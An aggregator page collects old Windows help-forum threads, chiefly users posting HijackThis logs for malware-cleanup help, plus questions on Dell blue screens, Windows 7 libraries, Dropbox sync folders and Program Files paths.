I do not have any idea regarding the hijackthis logfile of my computer, can you please interpret it for me sir many thanks to you guys and have a nice day here is the log:Logfile of Trend Micro HijackThis v2.0.2Scan saved at 9:24:47 PM, on 5/15/2009Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\PROGRA~1\AVG\AVG8\avgwdsvc.exeC:\Program Files\Bonjour\mDNSResponder.exeC:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exeC:\Program Files\Java\jre6\bin\jqs.exeC:\Program Files\Common Files\LightScribe\LSSrvc.exeC:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXEC:\WINDOWS\system32\nvsvc32.exeC:\WINDOWS\system32\PnkBstrA.exeC:\WINDOWS\system32\PnkBstrB.exeC:\PROGRA~1\AVG\AVG8\avgam.exeC:\PROGRA~1\AVG\AVG8\avgrsx.exeC:\PROGRA~1\AVG\AVG8\avgnsx.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\wscntfy.exeC:\Program ... Read more

A:Admin please help interpret my pc hijack log

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explanation about the tool. No input is needed, the scan is running.Notepad will open with the results, click no to the Optional_Sca... Read more

2 more replies
Answer Match 40.32%

Logfile of HijackThis v1.99.1
Scan saved at 7:13:47 PM, on 11/4/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\winlogon.exe
C:\Program Files\Softex\OmniPass\OPXPApp.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\MOZILL~1\FIREFOX.EXE
C:\Documents and Settings\Melody\My Documents\My Downloads\FixWelch.exe
C:\DOCUME~1\Melody\LOCALS~1\Temp\Temporary Directory 1 for hijackthis.zip\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = Live Search:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = Live Search:
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = Live Search:
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
R3 - URLSearchHook: (no name) - - (no file)
O2 - BHO: (no name) - SOFTWARE - (no file)
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {243B17DE... Read more

A:Please Interpret my Hijackthis gobbledydook

Hi..

Please download the Killbox.

Run Killbox, left click and drag you mouse over the highlighted files below (including filepath) then right click and choose Copy (including filepath) with your mouse, rightclick and choose Copy. Insert your mouse pointer within the box entitled "Full Filepath of File to Delete", rightclick again and choose File > Paste from Clipboard. All the files should now appear in the box (click on the Tab and check to make sure that only the files I have identified as malware and marked for deletion are there). If each file exists, it will appear in blue under that window when you click on it. Click on Delete on Reboot. Next click on > "Delete on Reboot" and click on "All Files". Please do this even if this option is already checked. You will get a message saying "File with be deleted on next reboot, click "Yes". Process and Reboot now?" Click "Yes" to reboot


C:\WINDOWS\System32\malfvux.exe
c:\windows\system32\jstgam.exe
c:\windows\system32\dhmqnpj.exe




Have "Hijack This" fix all the following items in the list below by placing a check in the appropriate boxes.Confirm that you have only the listed ones checked, then press <Fix checked> and Close HJT.

R3 - URLSearchHook: (no name) - - (no file)
O2 - BHO: (no name) - SOFTWARE - (no file)
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
O4 - HKLM\..\Run: [3140A... Read more

1 more replies
Answer Match 40.32%

Hello all. Long time reader, first time poster.

We recently purchased a new Dell machine, an Optiplex 380 with WinXP Pro (downgraded from 7). I've received five blue screens. Dell hardware diagnostics found no problems (ran memory, disk, cpu tests).

The first screen occurred during Windows update shortly after starting the computer for the first time. The others have been seemingly random. Please let me know what other info I should provide.

I'm not sure how you prefer to view blue screens, but here is the pertinent info:

-----------------------------------

The problem seems to be caused by the following file: ntoskrnl.exe

MEMORY_MANAGEMENT

Technical Information:

*** STOP: 0x0000001a (0x00041284, 0x02846001, 0x00000832, 0xc0883000)

*** ntoskrnl.exe - Address 0x804f9f43 base at 0x804d7000 DateStamp 0x4b7a9cac

-----------------------------------

The problem seems to be caused by the following file: ntoskrnl.exe

IRQL_NOT_LESS_OR_EQUAL

Technical Information:

*** STOP: 0x1000000a (0xc0e16788, 0x00000001, 0x00000000, 0x80505f23)

*** ntoskrnl.exe - Address 0x80505f23 base at 0x804d7000 DateStamp 0x4b7a9cac

-----------------------------------

The problem seems to be caused by the following file: ntoskrnl.exe

IRQL_NOT_LESS_OR_EQUAL

Technical Information:

*** STOP: 0x1000000a (0x00000000, 0x0000001c, 0x00000001, 0x8054d9db)

*** ntoskrnl.exe - Address 0x8054d9db base at 0x804d7000 DateStamp 0x4b7a9cac

--------------------------------------------

The... Read more

A:Multiple BSOD - please help interpret

On a new system...it's probably best to contact Dell immediately, IMO.

No system is supposed to start with BSODs. What you have is unacceptable for any consumer.

Louis

5 more replies
Answer Match 40.32%

Applications won't run because the paths can't be found but the files and folders all exist

More replies
Answer Match 40.32%

Is it possib to delete the shared document and libraries from my Seven ? Or will windows keep generating new ones at each boot ? Can I stop windows from doing this ? or have i have to live with this ?


PC-specs

Packard Bell Imedia
q8400
4 gb ram

etc


VV

A:Paths , Librabries ?

You need to remember that library's only point to the actual file somewhere on the network or on your own machine in the "user" files. If you need to delate something from the library you should delate the file from the actual source "my pictures" My documents" "my music".

But there is a way to make it work like you want.

Just go into Windows Media Player, choose the "organize" tab then "options" then choose the Library tab and set it to "delate files from the computer when delated from the Library. Although I believe that only works if you are delating files from Library of the machine that contains the source files.

That should allow for delating from the Library, but only from the machine that the files reside on, I don't believe it will work accross the network. It think it still works best if you delate from the file source instead of the Library.

1 more replies
Answer Match 40.32%

Im new to windows 10, i upgraded from windows 7. I am beyong annoyed with the File looking for is here, there, in that folder and dont forget the folder under it lol. I sync my phone to pc for Dropbox, Files starts to sync and im seeing the same file syncing over and over like 4 times, along with the annoying windows sounds each time. I look to see where they are going and one goes to a folder
Same file here
This PC-Windows C-users Branscum-dropbox

same file went here
Network-THEBRANSCUMS201-Users-Branscum-Dropbox
and here
C-users-craig and lisa-Dropbox

i could go on but im confusing my self even more...Please i dont need all them access points for the same file ...Could some one explain this to me
 

More replies
Answer Match 40.32%

I'm writing a batch file which calls a 32 bit .exe program. I want it to be compatible with the different Windows operating systems. The problem is that the path to "Program Files" is different depending which OS is being used. For instance:

I know the paths for these OS' since I use them:
- WinXP 32 bit: C:\Program Files\
- Vista 64 bit: C:\Program Files (x86)\

Could some kind souls please tell me what the 32bit paths are for:
- WinXP 64 bit:
- Vista 32 bit:

And for Windows 7 also would be nice:
- Win7 32 bit:
- Win7 64 bit:

Thanks!
Sky

A:Need help with paths in XP and Vista.

Environment variable - Wikipedia, the free encyclopedia

Look down in the section called "system path variable" for %ProgramFiles%.

Some other good stuff on that page as well.


Gil

6 more replies